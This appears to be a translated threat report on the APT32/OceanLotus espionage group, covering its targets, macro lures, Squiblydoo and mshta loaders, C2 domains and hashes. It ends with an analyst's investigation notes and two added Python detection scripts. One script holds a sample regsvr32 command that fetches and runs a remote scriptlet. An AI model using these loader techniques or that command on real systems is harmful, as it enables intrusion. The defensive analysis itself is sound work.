The cyber espionage group that FireEye has named APT32 (OceanLotus) targets private enterprises, foreign governments, dissidents and journalists across multiple industries. FireEye assesses that APT32 uses a unique and comprehensive malware suite combined with commercial penetration-testing tools to conduct targeted operations in line with Vietnam's national interests.

APT32 and FireEye Community Response

FireEye's Mandiant incident response consultants were investigating intrusions at several companies with business interests in Vietnam when they discovered intrusion activity and attacker-controlled infrastructure indicative of a significant intrusion campaign. In March 2017, in response to active targeting of FireEye customers, the team launched a Community Protection Event (CPE): a collaboration between the Mandiant incident response team, FireEye as a Service (FaaS), FireEye iSIGHT Intelligence and FireEye product engineers to protect all customers from APT32 activity. Over the next few weeks, FireEye released threat intelligence products and updated malware profiles to customers while developing new detection techniques for APT32's tools and phishing lures. This focused intelligence and detection effort allowed us to identify new external victims and obtain enough technical evidence to connect twelve previous intrusions, bringing together four previously unrelated threat actors into FireEye's newly named Advanced Persistent Threat group, APT32.

APT32 targets private companies in Southeast Asia

FireEye has observed APT32 targeting foreign businesses with vested interests in Vietnam's manufacturing, consumer products and hospitality sectors since at least 2014. There are also indications that APT32 attackers are targeting network security and technology infrastructure companies, as well as consulting firms that may have ties to foreign investors.
The following is an overview of FireEye's investigation into APT32:

- In 2014, a European company was attacked before building its manufacturing plant in Vietnam.
- In 2016, foreign companies working in Vietnam in industries such as network security, technology infrastructure, banking and media were attacked.
- In mid-2016, malware that FireEye believes is unique to APT32 was discovered on the network of a global hospitality developer planning to expand its operations in Vietnam.
- From 2016 to 2017, subsidiaries of U.S. and Philippine consumer product companies located in Vietnam were targeted by APT32 intrusion operations.
- In 2017, APT32 compromised the Vietnam office of a global consulting firm.

Table 1 shows a breakdown of APT32 activity, including the malware families used in each campaign.

APT32's interest in political influence and foreign governments

In addition to focusing on the private sector with ties to Vietnam, APT32 has also targeted foreign governments as well as Vietnamese dissidents and journalists since at least 2013. Here is an overview of this activity:

- The Electronic Frontier Foundation (EFF) published a blog post reporting that journalists, activists, dissidents and bloggers were targeted in 2013 using malware and tactics consistent with APT32 operations.
- In 2014, APT32 used a phishing attachment named "Plan to hold a protest in the Vietnamese embassy.exe" to target dissident activity among Vietnamese exiles in Southeast Asia.
- In 2014, APT32 carried out intrusions into Western legislatures.
- In 2015, SkyEye Labs, the security research arm of the Chinese company Qihoo 360, released a report detailing threat actors targeting Chinese public and private institutions, including government agencies, research institutions, maritime agencies, offshore construction and shipping companies. Information in the report indicated that the perpetrators used the same malware as APT32, with overlapping infrastructure and similar targets.
- In 2015 and 2016, two Vietnamese media outlets were attacked by malware that FireEye assessed as belonging to APT32.
- In 2017, the social engineering content of the lures indicated that they were used to target Vietnamese immigrants in Australia and government employees in the Philippines.

APT32 tactics

In the current campaign, APT32 uses ActiveMime files and social engineering techniques to trick victims into enabling macros. Once executed, the initial file downloads multiple malicious payloads from a remote server. APT32 attackers continue to deliver malicious attachments through phishing emails.

APT32 attackers designed multi-language decoy documents to target victims. Although these files have a ".doc" file extension, the recovered phishing lures are ActiveMime ".mht" web page archives containing text and images. These files were probably created by exporting Word documents to a single-file web page. Table 2 contains examples of recovered APT32 multi-language decoy documents.

Table 2: APT32 decoy document samples

The Base64-encoded ActiveMime data also contains an OLE file with a malicious macro. When opened, many of the decoy documents display a fake error message in an attempt to trick the user into enabling the malicious macro. Figure 1 shows a fake Gmail subject line with a matching hexadecimal error code, asking the recipient to enable content to resolve the error. Figure 2 shows another APT32 lure that uses a convincing fake Windows error message to instruct the recipient to enable content in order to display the document's font characters correctly.

Figure 1: APT32 phishing lure – fake Gmail error message
Figure 2: Example of APT32 phishing lure – fake file encoding error message

APT32 operators implemented a number of novel techniques to track the effectiveness of their phishing campaigns, monitor the distribution of malicious documents, and establish persistence mechanisms to dynamically update the backdoors injected into memory.
To track in real time who opened the phishing emails, viewed the links and downloaded the attachments, APT32 used cloud-based email analytics software designed for sales organizations. In some cases, APT32 simply forgoes the attachments and relies entirely on this tracking technology, linking to its ActiveMime lures hosted on external, legitimate cloud storage services.

To gain visibility into the further distribution of its phishing lures, APT32 leveraged the native web page functionality of its ActiveMime documents to link to external image hosts monitored by APT32. Figure 3 contains a sample phishing lure with an HTML image tag used for additional tracking by APT32.

Figure 3: Phishing lure containing an HTML image tag for additional tracking

When a document with this capability is opened, Microsoft Word will attempt to download the external image even if macros are disabled. In all of the phishing lures analyzed, the external image did not exist. Mandiant consultants suspect APT32 is monitoring web logs to track the public IP addresses used to request the remote images. Combined with the email tracking software, APT32 can keep a close eye on the spread and success rate of its phishing, gather further information on victim organizations, and monitor the interest of security companies.

Once macros are enabled on the target system, the malicious macro creates two named scheduled tasks as persistence mechanisms on the infected system. The first named scheduled task launches an application whitelisting bypass to execute a COM scriptlet that dynamically downloads the first backdoor from APT32 infrastructure and injects it into memory. The second named scheduled task, which is loaded from an XML file to falsify its task attributes, runs JavaScript code that downloads and launches a secondary backdoor delivered as a multi-stage PowerShell script.
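As an added illustration of the lure structure described above (this is not FireEye's code or anything from this blog), the following Python script decodes an MHT/ActiveMime document, looks for the embedded OLE container and VBA markers, and lists the external image tags that Word would fetch even with macros disabled. The sample lure and every host in it are constructed, and the zlib offset used for ActiveMime containers is an assumption.

```python
"""Triage an MHT/ActiveMime lure: find the base64 part carrying an OLE file with
VBA markers, and any external image tag that Word would fetch with macros off.
Added example (not FireEye's or this blog's code); the sample lure is constructed."""
import base64
import email
import re
import zlib

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE2 compound file header
ACTIVEMIME_SIG = b"ActiveMime"                  # header of Word's .mso web-archive container
VBA_MARKERS = (b"vbaProject", b"_VBA_PROJECT", b"VBA/")
EXT_IMG = re.compile(r'<img[^>]+src=["\']?(https?://[^"\'\s>]+)', re.I)

def _maybe_inflate(data):
    # ActiveMime wraps a zlib stream holding the OLE file (assumption: stream starts at first 0x78 0x9c)
    off = data.find(b"\x78\x9c")
    if not data.startswith(ACTIVEMIME_SIG) or off == -1:
        return data
    try:
        return zlib.decompressobj().decompress(data[off:])
    except zlib.error:
        return data

def triage_mht(text):
    """Return external image URLs, the number of OLE parts, and whether VBA markers were seen."""
    findings = {"external_images": [], "ole_parts": 0, "vba_macro": False}
    for part in email.message_from_string(text).walk():
        if part.get_content_maintype() == "multipart":
            continue
        body = part.get_payload(decode=True) or b""  # base64 parts are decoded here
        if part.get_content_type() == "text/html":
            findings["external_images"] += EXT_IMG.findall(body.decode("ascii", "replace"))
            continue
        data = _maybe_inflate(body)
        if body.startswith(ACTIVEMIME_SIG) or data.startswith(OLE_MAGIC):
            findings["ole_parts"] += 1
            findings["vba_macro"] |= any(m in data for m in VBA_MARKERS)
    return findings

# Constructed sample: an HTML part with a 1x1 tracking image, plus an .mso part whose
# base64 decodes to an OLE header followed by a VBA project marker.
_ole = OLE_MAGIC + b"\x00" * 8 + b"vbaProject.bin" + b"\x00" * 8
SAMPLE_MHT = (
    'MIME-Version: 1.0\r\nContent-Type: multipart/related; boundary="----=_NextPart_01"\r\n\r\n'
    "------=_NextPart_01\r\nContent-Type: text/html\r\n\r\n"
    '<html><body><p>Report</p><img src="http://tracker.example.invalid/p.png" width=1 height=1>'
    '<img src="image001.png"></body></html>\r\n'
    "------=_NextPart_01\r\nContent-Location: file:///C:/editdata.mso\r\n"
    "Content-Transfer-Encoding: base64\r\n\r\n" + base64.b64encode(_ole).decode() + "\r\n"
    "------=_NextPart_01--\r\n"
)
```

Run `triage_mht(SAMPLE_MHT)` to get the external image URL and the macro finding; on a real lure, a non-existent remote image plus an OLE part with VBA markers is the combination to alert on.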
In most lures, one scheduled task persists an APT32-specific backdoor and the other initializes a commercially available backdoor (Cobalt Strike) as a fallback. To illustrate the sophistication of these lures, Figure 4 shows the recovered APT32 lure "2017 Employee Salary and Allowance Amount Statistical Report.doc".

Figure 4: APT32 ActiveMime decoy creates two named scheduled tasks

In this example, a scheduled task named "Windows Scheduled Maintenance" was created to run Casey Smith's "Squiblydoo" application whitelisting bypass. While all payloads can be updated dynamically, at the time of analysis this task loaded a COM scriptlet (".sct" file extension) that downloaded and executed Meterpreter hosted on images.chinabytes.info and then loaded Cobalt Strike's BEACON, using the "safebrowsing" Malleable C2 profile to blend its network traffic (in preparation for the next step, lateral movement).

Another scheduled task named "Scheduled Defrags" was created by loading the original task XML with a falsified task creation timestamp of June 2, 2016. This second task runs "mshta.exe" every 50 minutes, which launches an APT32-specific backdoor: a PowerShell script containing shellcode. It is configured to communicate with the domains blog.panggin.org, share.codehao.net and yii.yiihao126.net.

Figure 5 shows the chain of events in which APT32 successfully used a phishing lure to dynamically inject two multi-stage malicious frameworks into memory.

Figure 5: APT32 phishing chain of events

What is notable is that APT32 operations do not stop once a foothold is established in a victim environment. Several Mandiant investigations revealed that after gaining access, APT32 would regularly clear selected event log entries and heavily obfuscate its PowerShell-based tools and shellcode loaders with Daniel Bohannon's Invoke-Obfuscation framework.
APT32 frequently uses stealth techniques to blend in with legitimate user activity:

- During one investigation, APT32 used a privilege escalation exploit (CVE-2016-7255) disguised as a Windows hotfix.
- In another investigation, APT32 compromised McAfee ePO servers and distributed its malware payloads to all systems as software deployment tasks pushed over the ePO server's proprietary SPIPE protocol.
- APT32 also uses hidden or non-printing characters to visually camouflage its malware on the system. For example, APT32 installs a backdoor as a persistent service with a legitimate service name supplemented by a Unicode no-break space character. Another backdoor uses a legitimate DLL name padded with a non-printing operating system command control character.

APT32 malware and servers

APT32 appears to have extensive resources to develop and use multiple custom multi-protocol backdoors. APT32 operations are characterized by the deployment of malware payloads from the WINDSHIELD, KOMPROGO, SOUNDBITE and PHOREAL families. APT32 frequently deploys these backdoors as well as the commercially available Cobalt Strike BEACON backdoor. APT32 also has backdoor development capabilities for macOS. The distinctive features of the malware kit are shown in Table 3.

Table 3: APT32 malware capabilities

APT32 operators appear to be well-resourced and supported, as they use a large number of domain names and IP addresses as command and control servers. The FireEye iSIGHT Intelligence MySIGHT Portal contains more information about these backdoor families based on Mandiant's investigation into APT32 intrusions. Figure 6 provides a summary of APT32 tools and techniques mapped to each stage of the attack lifecycle.

Figure 6: APT32 attack lifecycle

Outlook and implications

FireEye assesses APT32 as a cyber espionage group aligned with Vietnamese government interests, based on incident response investigations, product detections, intelligence observations, and other publications about the relevant operators.
APT32's targeting of private sector interests is noteworthy, and FireEye believes that the group poses a significant risk to companies doing business in or preparing to invest in the country. While the motivation for each APT32 intrusion varies and in some cases is unknown, unauthorized access (the intrusions themselves) can serve as a platform for law enforcement, intellectual property theft, or anti-corruption measures, and ultimately may erode the competitive advantage of the targeted organization. In addition, APT32 continues to threaten political activism and freedom of expression in Southeast Asia and in the public sector around the world. Governments, journalists and members of the Vietnamese diaspora may continue to be its targets.

APT32 detection

Figure 7 contains a YARA rule that can be used to identify malicious macros associated with APT32's phishing lures.

Figure 7: YARA rule for APT32 malicious macros

Table 4 contains a sample of the C2 servers that FireEye associates with APT32.

Table 4: APT32 C2 server samples

Finally, OceanLotus has had a great impact on our government units and enterprises. Many of us tend to think that APT is far away from us, but in the recent DFIR process, SkyEye Lab and Antiy have released reports with very detailed analyses of the OceanLotus backdoor. Of course, there are many samples, but because of the lack of understanding of the organization behind them, analysis and attribution of the group have been quite vague for a long time (for instance, the "quasi-APT" label). This article temporarily satisfies the curiosity of some people and shows the determination of a certain country... As FireEye said, the obfuscation of the related logs and PowerShell will basically not give you any clues, so you can only rely on platforms like a SIEM for correlation and backtracking.
As FireEye said, this organization became active again during the period from January to March, and in one investigation it was found that this organization was quite familiar with the customs and festivals of the country it invaded. For example, one burst of abnormal traffic was concentrated on January 26, and it was later learned that January 27 was the New Year's Eve holiday... They often know the habits of administrators and of the security companies in the target country (for example, security personnel often use AWVS, so they release a cracked version, and then you get hacked), and are quite good at information gathering.

The following figure shows the files found during the investigation in March.

The following figure shows the process of OceanLotus using regsvr32.exe to download and load the icon7.gif backdoor. The purpose is to bypass AppLocker.
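Added example, not code from FireEye or this blog: detection logic in Python for the behaviours described in the APT32 tactics section above (regsvr32 loading a remote COM scriptlet, mshta-launched stagers, service names padded with a no-break space) and for the regsvr32/icon7.gif loader in this investigation. The event records, their field names (type, cmdline, name) and all hosts are constructed placeholders, not indicators from the reports.

```python
"""Detection logic for the APT32 tradecraft on this page: regsvr32 fetching a remote
scriptlet (Squiblydoo / AppLocker bypass, like the icon7.gif loader), mshta-launched
stagers, and service or task names padded with invisible Unicode such as U+00A0.
Added example, not the page's own code; events and hosts below are constructed."""
import re
import unicodedata

# Rule name -> pattern applied to the process command line.
CMDLINE_RULES = {
    "regsvr32_remote_scriptlet": re.compile(
        r"\bregsvr32(\.exe)?\b.*\s/i:\S*https?://\S+.*\bscrobj\.dll\b", re.I),
    "regsvr32_remote_resource": re.compile(r"\bregsvr32(\.exe)?\b.*https?://\S+", re.I),
    "mshta_script_stager": re.compile(
        r"\bmshta(\.exe)?\b.*(javascript:|vbscript:|https?://|\.hta\b)", re.I),
}

def invisible_chars(name):
    """Return the non-ASCII spaces, format and control characters in a service/task name."""
    return [ch for ch in name
            if unicodedata.category(ch) in ("Cf", "Cc")
            or (unicodedata.category(ch) == "Zs" and ch != " ")]

def classify(event):
    """Return the list of rule names an event triggers (empty if nothing matched)."""
    hits = []
    if event["type"] == "process":
        hits += [n for n, pat in CMDLINE_RULES.items() if pat.search(event["cmdline"])]
    elif event["type"] in ("service", "task") and invisible_chars(event["name"]):
        hits.append("name_with_invisible_chars")
    return hits

def triage(events):
    """Map each flagged event's command line or name to its rule hits."""
    result = {}
    for e in events:
        hits = classify(e)
        if hits:
            result[e.get("cmdline") or e["name"]] = hits
    return result

# Constructed events (203.0.113.0/24 is a documentation range, not an APT32 indicator).
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.7/icon7.gif scrobj.dll"},
    {"type": "process", "cmdline": "mshta.exe http://203.0.113.7/update.hta"},
    {"type": "process", "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"'},
    {"type": "process", "cmdline": "svchost.exe -k netsvcs"},
    {"type": "service", "name": "Windows Update\u00a0"},  # trailing U+00A0 no-break space
    {"type": "task", "name": "Windows Scheduled Maintenance"},
]
```

The same checks translate directly into SIEM correlation rules over process-creation and service-install events; the invisible-character check is what catches the no-break-space service name that looks legitimate on screen.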
The following figure is a screenshot of the icon7.gif sample, which calls the System.dll module. SHA256: 95DFCCF3933A43676A967DE39A8A6C1297729836EEAA5833B5EEE46102B1E1BB

Even now, many of the payloads still evade antivirus detection.
Here is the Tencent Habo sandbox analysis: https://habo.qq.com/file/showdetail?md5=569797689d2f779668b107224d36beb0 Its IOCs match the OceanLotus activity we have been tracking. SHA256: 0692DF991CB7CCC2DC50E13817AE682BD2C1ECC0F8F46CFDC9CC9D34CE7215AD

The recent WannaCry ransomware incident caused a large number of hosts to fall, and OceanLotus also took advantage of the situation on the 12th. Although there is still relatively little knowledge about the organization, it is certain that it does use Vietnamese citizens to cover up its identity. Generally speaking, its actions are relatively covert, but perhaps due to individual members, particular tasks or the need to expand its results, sometimes quite aggressive attacks are carried out (such as attacking core switches, ARP attacks, etc.). Perhaps FireEye's exposure will make it go quiet for a while.